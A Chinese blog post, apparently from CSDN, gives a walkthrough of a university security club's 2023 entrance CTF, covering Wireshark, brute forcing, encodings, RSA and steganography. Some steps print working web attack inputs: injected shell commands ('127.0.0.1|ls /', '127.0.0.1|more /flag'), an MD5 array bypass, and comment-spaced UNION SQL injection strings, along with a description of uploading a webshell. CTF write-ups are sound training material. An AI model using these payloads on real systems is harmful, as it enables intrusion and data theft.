【复现】23春云曦开学考核 Writeup

已于 2023-06-25 21:34:25 修改
阅读量423 收藏 3
点赞数
文章标签: 安全
于 2023-03-12 19:16:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/129369196
版权

目录

1.流量分析

2.flag在哪?

3.传个参吧

4.Boom!

5. easy-upload

6.easy-rce

7.easy_php​编辑

8.怎么?只会贝斯拿不下你?

9.easy_rsa 

10.简单的密码

11.music

12.5+n的凯撒

13.easy_include

14.徐江的嘲讽

15.今天你学习了吗?

16.想看我驴哥吗?

17.Life Story

18. easy_sql​编辑

19.NC

​编辑

1.流量分析

使用Wireshark查看数据流,查找flag:

这里flag是找到了,可以通过下图这个追踪tcp流获取:

2.flag在哪?

这是我们的签到题:

没有提示,源代码也不给打开。 用bp抓包:

flag就在源代码里面,只是不能直接访问,bp抓包就出来了。

3.传个参吧

看源代码:

源代码是提示传一个hint参数,而且是GET形式:

传入hint后又提示要传入一个POST的参数:

Exam=Welcom_come_to_Yunxi_Exam

传入后成功获得flag。

4.Boom!

这题是爆破题,还有一个提示:

 提示的源代码如下:

 

学号是12位的,现在已知了前10位了,用bp爆破后两位就可以:

 

 

爆破成功,输入管理员密码,得到flag:

5. easy-upload

一道文件上传题,上传一句换木马来进入后台获取flag,这里对.php做了屏蔽,改后缀为.jpg就行:

用bp抓包,把jpg改成php,这样一句话木马才能工作:

用蚁剑连接,在根目录下找到flag就行。

6.easy-rce

ping个127.0.0.1

有回显,查看一下目录:127.0.0.1|ls

flag不在里面,用127.0.0.1|ls /

查看根目录:

发现有flag,用cat指令发现被屏蔽了,那换一个more来查看:127.0.0.1|more /flag

或者下面这些也可以:

7.easy_php

php题,直接给出了代码

看见md5,是md5比较漏洞绕过,在比较中让两个结果都为0,0=0绕过:

payload:?0[]=2023f&1[]=2) 

8.怎么?只会贝斯拿不下你?

base编码,base64,base32,base100等各种都有可能

看末尾4个=,不可能是base64,猜测是32,先base32解码

base32解密后就是base64了,解码得到flag

 

9.easy_rsa 

求d,这里用到python辅助计算,先安装 gmpy2 库,将pqe的值代入脚本

24527367497845132449676798197906233313就是flag的内容。

10.简单的密码

这是社会主义核心价值观啊,一种编码方式,解码一下:

解码出来是百家姓编码,再解码即可:

11.music

mp3格式,音频隐写,使用工具MP3Stego ,在文件所在位置打开cmd:

先输入Decode.exe

再输入Decode -X music.mp3 -P nono

这样就是成功了,在原来的文件里面多出来一个 .txt

12.5+n的凯撒

密文是包含大小字母及符号的,推出为ASCII码偏移加密,找到一张ASCII码表对照来看:

afZ_对应flag,他们每位字符分别向后偏移了5,6,7,8位,即5+n位,理解了题目,现借助python脚本来对这个字符串解码:

 

13.easy_include

文件包含漏洞的题,写一句?file=flag.php 看看源代码:

找到flag。

14.徐江的嘲讽

文件解压时,有头部错误的提示:

flag.txt打开发现需要密码,是文件隐写,010打开可以直接看到内容:

15.今天你学习了吗?

图片隐写题, 查看图片属性,其实图片其实是不完整的:

找到图片的宽高,修改一下,让他显示完整,1024在010editor里面显示是400(16进制),把400改成800:

 

flag成功显示了出来。

16.想看我驴哥吗?

使用AZPR工具密码爆破,密码为6位数字:

 密码是604604,解压文件:

记事本打开这个图片

这一串base64就是flag,用文本替换功能把中间的空格消除掉:

17.Life Story

 虽然是rar后缀,但是其实是一个txt文件,直接用记事本就可以打开:

emoji形式,像是一种编码,通过百度了解到这是base100编码:

解码后是base32,base32解码:

最后再进行base64解码即可:flag{19cb2eeae5c953a32fa873e0682ed330}

18. easy_sql

本题是空格绕过的题,首先-1'/**/order/**/by/**/3#查询到列数为3。

其次-1'/**/union/**/select/**/1,2,3#爆出显示位:

然后获取当前数据库名-1'/**/union/**/select/**/database(),2,3#

然后子查询 :

-1'/**/union/**/select/**/group_concat(table_name),2,3/**/

from/**/

information_schema.tables/**/where/**/table_schema=database()#

得到了数据表bighacker之后,访问bighacker获取flag

 -1'/**/union/**/select/**/group_concat(concat_ws("~",hack2,hack3)),2,3/**/from/**/bighacker#

19.NC

kali自带nc工具,nc 192.168.31.77 1337

7ig3r
关注
BUUCTF misc 专题(51)[ACTF新生赛2020]outguess
tt_npc的博客
04-15 2587
下载附件,打开压缩包 查看文件以后回看题目outguess,文件中有图片,又是outguess,立刻想到了outguess隐写 并且文本也提示了 我们先查看图片图片属性 发现了一串社会主义核心价值观,就知道了是社会主义核心价值观解密 CTF在线工具-在线核心价值观编码|核心价值观编码算法|Core Values Encoder在线核心价值观编码、核心价值观编码算法、Core Values Encoderhttp://www.hiencode.com/cvencode.html ...
2022级实验室考试(一)web
lulu001128的博客
03-08 782
解决过程
CTF之easyupload
最新发布
qq_74263993的博客
07-14 377
拿到题目发现是文件上传的漏洞,但是这个黑名单过滤的有点严格,无论是文件里还是文件后缀都不能出现php那我们就用<??>来进行绕过(注意这里要加个GIF89a或者GIP87a进行欺骗)但是后缀依然不能绕过怎么办?接下来就要学新知识了。
攻防世界ctf题目easyupload
weixin_71982689的博客
07-07 330
包含后,相当于将jpg的内容复制一份到index.php文件中,所以,只要jpg内容包含合法的php代码,当我们访问/uploads/index.php时,就能够执行。但是改值好麻烦啊,看到其他师傅说用gif的GIF89a这个标识头,挺好,这个不是乱码,能直接在Raw里写。通过查看前端源代码找到uploads/index.php文件,现在这个文件已经包含了我们传入的文件内容。文件名:.user.ini,这是一个用户自定义的文件,用于给特定的目录做设置。看一眼,好像文件头标识有点问题,乱七八糟。
ctf练习之Easy upload
SDM_JH的博客
08-07 2875
一、进入目标站点,查看网页源码,发现上传后缀白名单。 二、先上传一个.png的图片看看,得到提示。 三、打开burp suite,设置代理。修改上传的文件名,绕过前端限制,得到新的提示。 四、在图片内容的中间位置插入内容,得到flag ...
网络安全实验室2024季学期开学复现Writeup
2401_84302655的博客
04-27 1008
通过使用my_parameter[]=1,相当于是告诉服务器,我们在传递的是一个包含1的数组而非数字或字符串,在这种情况下,$_GET[‘my_parameter’]得到的将是一个数组,而不是一个单一的值。原本脚本的设计是利用preg_match函数和正则表达式来检查my_parameter的值中是否包含数字,然而,当my_parameter是一个数组时,函数无法处理这样的输入,从而直接绕过检查。
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 818
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
网络安全实验室2024季学期开学复现Writeup,掌握这6大技能体系
m0_60607971的博客
04-06 1066
分析题目,师姐的生日无非从0101到1231,可以确定是数值爆破。这里需要使用的工具是Burpsuite抓包工具。Burp Suite 是一款集成了各种网络攻击工具的平台,用于对Web应用进行安全性测试。它可以拦截、查看和修改发往服务器的HTTP/HTTPS请求。在这个过程中,Burp Suite充当了客户端(例如,你的浏览器)和Web服务器之间的中间人,允许你在请求继续前往服务器之前对其进行审查和修改。
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2533
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3754
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
include_EasyC_
09-30
简单c语言程序供初学者学习使用参考借鉴帮助初学者设计继程序
青少年CTF Misc-Easy 百家姓 WP
weixin_55265137的博客
10-13 984
青少年CTF Misc-Easy 百家姓 WP
[ISITDTU 2019]EasyPHP rce替换字母
qq_62046696的博客
12-18 623
打开界面有两个if首先要绕过第一个正则,限制了 oxoo-空格的字符 和数字,还有一些字母然后第二个就是字符的种类不能超过13个首先第一个用取反,传入?没反应。
PhpStorm配置debug环境
qq_51907507的博客
09-20 5130
快乐php
【GXUCTF】easy_rce
weixin_51572769的博客
10-10 871
讲一下我的解题过程,期间碰壁无数,值得写(shui)一篇wp~ 首先贴题目地址( http://120.24.194.57:3700/ 页面代码: <?php header("Content-type: text/html; charset=utf-8"); error_reporting(0); highlight_file(__FILE__); # hint:flag在/flag里~ if(isset($_GET['bypass'])){ $bypass = $_GET['bypas
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1890
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
[SWPUCTF 2021 新生赛]easyrce
qq_62046696的博客
05-09 3407
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ?url=system("cat /f*"); 2\?url=system("cat /flllllaaaaaaggggggg"); [SWPUCTF 2021 新生赛]easy_sql 打开界面属实给我整不会了。 1.然后测一下是否存在sql漏洞,因为题目中说了参数是wllm,首先输入一下?wll...
合天每周CTF之第五周-Easy upload
xxhjtc的博客
12-13 922
1.题目描述: 1).进入环境,查看页面源代码,发现限制文件格式为png,jpg,gif: 2).创建文本文档,修改格式为1.png,上传,提示图片格式不对: 3)寻找实验环境内其他图片,重新上传: 4).得到提示信息,可以得知是进行文件头检测,打开burpsuite抓包,将文件名修改为give_me_flag.php: 修改前: 修改后: 5).得到提示信息,文件内需要包含:givemeflag,将该字符串粘贴至文件内任意位置,提交得到flag: 6)fla..
从N1CTF easy_php学到的几个骚操作
Sp4rkW的博客
03-19 4697
认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。 反序列化点SoapClient php自带类的利用 #使用的是SoapClient这个php自带类 # 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求 $a = new SoapClient(null, array( 'location'=&amp;...
2024考核Web复现:密码破解与购物漏洞利用
"本文介绍了24年考核中关于Web方向的部分题目,涉及Web安全及Burp Suite工具的使用,特别是 Intruder 模块在密码爆破和漏洞利用中的应用。" 在这次考核的Web方向题目中,首先是一个与“师姐的生日”相关的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值